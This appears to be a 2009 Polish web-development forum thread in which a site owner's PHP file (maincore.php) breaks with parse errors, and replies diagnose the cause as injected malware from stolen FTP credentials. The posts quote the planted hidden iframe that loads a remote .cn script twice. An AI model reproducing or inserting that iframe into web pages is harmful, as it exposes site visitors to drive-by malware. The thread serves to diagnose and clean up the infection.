jugoton
11.05.2009, 10:02:54
function makefileopts($files, $selected="") {
$res = "";
for ($i=0;$i < count($files);$i++) {
$sel = ($selected == $files[$i] ? " selected" : "");
$res .= "<option value='".$files[$i]."'$sel>".$files[$i]."</option>\n";
}
return $res;
}
// Universal page pagination function by CrappoMan
function makepagenav($start,$count,$total,$range=0,$li
<iframe src="http://liteautotoponline.cn/ts/in.cgi?mozila11" width=2 height=4 style="visibility: hidden"></iframe>
wookieb
11.05.2009, 10:06:07
Odpowiadając na pytanie w temacie, to błędem jest własnie ten temat i 0 informacji o problemie = 0 pomyślunku autora = nieczytanie regulaminu
To ja ci pokaże zdjęcie mojego lapka i chcesz zgadywać jakiego OS-a sobie wgrałem?
POKAŻ BŁĄD
jugoton
11.05.2009, 10:13:16
Ostatnio otwierając stronę zamiast strony pojawia się komunikat
"Parse error: syntax error, unexpected '}', expecting ')' in /home/szaszk/public_html/maincore.php on line 1126"
A oto linia 1126
<iframe src="http://liteautotoponline.cn/ts/in.cgi?mozila11" width=2 height=4 style="visibility: hidden"></iframe>
wookieb
11.05.2009, 10:14:55
Kod
function makepagenav($start,$count,$total,$range=0,$li
Jak coś robilesna pliku to usunales kod tej funkcji. Popraw.
jugoton
11.05.2009, 10:20:47
To co mam zrobić bo nie kumam
wookieb
11.05.2009, 10:26:09
Przywróć oryginalny plik. A jeżeli to jest oryginał to przykro mi nic nie zrobisz. No chyba, że sam dopiszesz kod.
melkorm
11.05.2009, 10:27:46
Hmm, jeżeli nic nie robiłeś to w/g mnie to jakiś wirus wrzucił Tobie na strona frame'a poprostu.
Zmień hasła do FTP'a i wrzuć poprzednią wersje pliku.
nithajasz
11.05.2009, 10:30:14
@melkorm
Może i racja..
<?php
function makepagenav($start,$count,$total,$range=0,$link=""){ ... }
?>
melkorm
11.05.2009, 10:33:49
Cytat
@melkorm
Widać w jego pierwszym poście, że ma kawałek definicji funkcji ucięte wiec to nie iframe, tylko brakuje mu kodu, mógłbym zgadywać że coś robił zaznaczył nie chcąca wcisnął spacje i ma
Ucięte bo mógł mu ten iframe uciąć ? Widać że chłopak raczej się nie zna i pewnie tego nie edytował
wnioskuje po:
Cytat
Ostatnio otwierając stronę zamiast strony pojawia się komunikat
Więc raczej bym obstawiał tego frame'a x]
jugoton
11.05.2009, 10:36:24
Nie posiadam kopi tego pliku tylko to co zostało.
melkorm
11.05.2009, 10:43:34
No to raczej Tobie nie pomożemy ... chyba że podasz więcej szczegółów , może poproś admina hostingu o backup czy coś ... .
jugoton
13.05.2009, 13:39:11
Oki Dzięki za pomoc to wina admina hostingu. Ja przeciez płacę za hosting i bezpieczeństwo. Nikt i nic tam grzebać nie mogło. Niech się teraz on martwi jakzrobić backup strony lub pliku
Warning: Unexpected character in input: ''' (ASCII=39) state=1 in /home/szaszk/public_html/maincore.php on line 101
Parse error: syntax error, unexpected $end, expecting ']' in /home/szaszk/public_html/maincore.php on line 101
I pojawia się
// Sanitise $_SERVER globals
$_SERVER['PHP_SELF'] = cleanurl($_SERVER['PHP_SELF']);
$_SERVER['QUERY_STRING'] = isset($_SERVER['QUERY_STRING']) ? cleanurl($_SERVER['QUERY_STRING']) : "";
$_SERVER['REQUEST_URI'] = isset($_SERVER['REQUEST_URI']) ? cleanurl($_SERVER['REQUEST_URI']) : "";
$PHP_SELF = cleanurl($_SERVER['PHP_SELF']);
DoriS.
15.05.2009, 14:03:50
Kod
To jest wirus. A dokładniej Trojan-Clicker.HTML.IFrame.agk
To nie wina Twojego hostingu tylko TC. Coś wykradło komuś kto go używa hasła i poszło na ftpy i powklejało ten śliczny kodzik. Nie trzeba latać z gołą dupą po sieci było. Kod masz pewnie powklejany we wszystkie indexy php i htm, html we wszystkie pliki w których nazwie masz default, index i mainbody
Niestety to coś również tnie pliki...
Pozmieniaj hasła do ftp a potem poczysć sobie kod zanim google zafiltruje Ci stronę.
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę
kliknij tutaj.